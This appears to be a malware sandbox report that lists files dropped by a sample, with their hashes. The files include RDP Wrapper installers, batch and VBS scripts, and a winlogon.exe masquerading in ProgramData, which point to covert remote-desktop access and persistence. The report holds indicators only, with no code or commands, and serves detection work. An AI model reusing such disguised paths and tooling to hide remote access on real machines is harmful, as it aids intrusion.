C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

C:\rdp\Rar.exe

MD5 2e86a9862257a0cf723ceef3868a1a12
SHA1 a4324281823f0800132bf13f5ad3860e6b5532c6
SHA256 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA512 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

C:\rdp\db.rar

MD5 462f221d1e2f31d564134388ce244753
SHA1 6b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA512 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

C:\programdata\microsoft\temp\H.bat

MD5 76303bb3bb0faa707000df998d8c9f3d
SHA1 5b25444c92c7625e1ca77ed2eb1b4ba6877ba066
SHA256 a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549
SHA512 25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c

C:\Programdata\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

C:\ProgramData\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

C:\rdp\install.vbs

MD5 6d12ca172cdff9bcf34bab327dd2ab0d
SHA1 d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256 f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512 b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

C:\rdp\bat.bat

MD5 5835a14baab4ddde3da1a605b6d1837a
SHA1 94b73f97d5562816a4b4ad3041859c3cfcc326ea
SHA256 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92
SHA512 d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

C:\rdp\RDPWInst.exe

MD5 3288c284561055044c489567fd630ac2
SHA1 11ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256 ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512 c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

C:\rdp\RDPWInst.exe

MD5 3288c284561055044c489567fd630ac2
SHA1 11ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256 ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512 c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

C:\programdata\microsoft\temp\Temp.bat

MD5 9380f21201174ac1267aa944e1096955
SHA1 e97bd59509694d057daaf698a933092f804fe2e3
SHA256 ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512
SHA512 ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27

\??\c:\program files\rdp wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

memory/2372-288-0x0000000000400000-0x0000000000AB9000-memory.dmp